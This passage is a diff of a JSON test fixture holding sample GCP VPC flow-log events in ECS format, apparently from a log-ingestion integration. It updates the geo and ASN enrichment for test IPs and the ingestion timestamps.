@@ -7534,16 +7898,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34906, 
@@ -7557,6 +7956,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415214125Z", + "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:50.642206049Z", + "end": "2019-06-14T03:48:50.757255245Z", + "id": "bnj3cofh3cdko", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7568,7 +7977,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -7576,9 +7987,12 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.14" + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -7599,28 +8013,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391575400Z", - "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:50.642206049Z", - "end": "2019-06-14T03:48:50.757255245Z", - "id": "bnj3cofh3cdko", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 52454, 
@@ -7634,6 +8038,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415214608Z", + "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:40.779893091Z", + "end": "2019-06-14T03:42:40.888804332Z", + "id": "bnj3cofh3cdke", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7645,25 +8059,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -7674,23 +8087,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391580300Z", - "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:40.779893091Z", - "end": "2019-06-14T03:42:40.888804332Z", - "id": "bnj3cofh3cdke", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -7699,11 +8103,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34090, 
@@ -7711,6 +8120,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415215068Z", + "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:37.712749588Z", + "end": "2019-06-14T03:46:37.827345444Z", + "id": "bnj3cofh3cdka", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -7722,46 +8141,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391584100Z", - "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:37.712749588Z", - "end": "2019-06-14T03:46:37.827345444Z", - "id": "bnj3cofh3cdka", - "category": "network", - "type": "connection" } }, { 
@@ -7776,11 +8155,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7852,7 +8236,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391588500Z", + "ingested": "2021-12-14T14:43:27.415215478Z", "original": "{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", 
@@ -7868,11 +8252,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33570, @@ -7950,7 +8339,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391592600Z", + "ingested": "2021-12-14T14:43:27.415215875Z", "original": "{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", 
@@ -7966,11 +8355,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33858, @@ -8048,7 +8442,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391596300Z", + "ingested": "2021-12-14T14:43:27.415216266Z", "original": "{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", 
@@ -8064,11 +8458,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33590, @@ -8146,7 +8545,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391600200Z", + "ingested": "2021-12-14T14:43:27.415216653Z", "original": "{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", 
@@ -8244,7 +8643,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391603600Z", + "ingested": "2021-12-14T14:43:27.415217044Z", "original": "{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", @@ -8260,11 +8659,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33536, 
@@ -8342,7 +8746,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391608Z", + "ingested": "2021-12-14T14:43:27.415217437Z", "original": "{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", @@ -8364,11 +8768,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -8440,7 +8849,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391613600Z", + "ingested": "2021-12-14T14:43:27.415217877Z", "original": "{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", 
@@ -8538,7 +8947,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391619400Z", + "ingested": "2021-12-14T14:43:27.415218256Z", "original": "{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", @@ -8554,11 +8963,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33874, 
@@ -8636,7 +9050,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391624900Z", + "ingested": "2021-12-14T14:43:27.415218692Z", "original": "{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T